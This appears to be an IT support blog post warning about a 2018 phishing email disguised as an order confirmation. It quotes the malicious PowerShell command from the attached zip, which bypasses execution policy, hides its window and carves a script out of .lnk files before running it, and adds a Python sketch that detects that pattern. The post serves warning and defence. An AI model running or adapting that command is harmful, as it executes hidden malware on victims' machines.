sircles.net Computer Support The sircles IT support & solutions blog | Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent


The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent


This email has been spotted this week:

 

 

 

From: lou_weihe@clarityconfidenceandcash.com

Sent: Monday, July 30, 2018 10:52 PM

To: Recipient

Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
The link in the email downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are rarely used for order confirmations anyway, but this website, https://johanwolf.com, obviously has a valid certificate and is being misused by someone. The website itself just seems to forward to Office365 support for some reason.
 
If you unzip the file that is provided you see an image:
 
 
Which presumably pretends to be a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
Which will make serious changes to your system. Looking at this, we are not sure it would work, but we might try it on an old PC...
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
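The command quoted above uses findstr to pull lines containing a marker string out of .lnk files into file.ps1 and then runs that file, with PowerShell switches shortened and mixed-case. The following detection sketch is an added example, not part of the original post; the indicator names, the scoring rule and the second (benign) sample line are assumptions made for illustration.

```python
import re

# Constructed samples: the command line quoted in the post, plus a benign one.
SAMPLES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
]

def is_param(token, full, min_len, aliases=()):
    """True if token is a shortened form of a switch; powershell.exe accepts prefixes in any case."""
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full.startswith(name))

def indicators(cmdline):
    """Return the names of the suspicious traits found in one process command line."""
    found = set()
    if not re.search(r"\bpowershell(\.exe)?\b", cmdline, re.I):
        return found
    tokens = cmdline.split()
    for tok, nxt in zip(tokens, tokens[1:] + [""]):
        value = nxt.lower()
        if is_param(tok, "noprofile", 3):
            found.add("no_profile")
        elif is_param(tok, "executionpolicy", 2, aliases=("ep",)) and value in ("bypass", "unrestricted"):
            found.add("policy_bypass")
        elif is_param(tok, "windowstyle", 1) and value == "hidden":
            found.add("hidden_window")
    # findstr run over shortcut files with its output redirected into a .ps1
    if re.search(r"findstr\b[^;|&]*\.lnk\b[^;|&]*>\s*\S+\.ps1", cmdline, re.I):
        found.add("script_carved_from_lnk")
    # the freshly written script is executed in the same command line
    if re.search(r">\s*(\S+\.ps1)\s*;\s*\.\\\1", cmdline, re.I):
        found.add("runs_dropped_script")
    return found

def is_suspicious(cmdline):
    """Flag the .lnk carving pattern, or two or more evasive switches together."""
    hits = indicators(cmdline)
    return "script_carved_from_lnk" in hits or len(hits) >= 2
```

Feed it the command-line field from process-creation logs (for example Windows event 4688 with command-line auditing enabled, or Sysmon event 1).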
 
 

Comments (1) -

upnt 28/11/2018 22:24:26 #

698042 651870I respect your piece of function, appreciate it for all of the intriguing content material. 757816
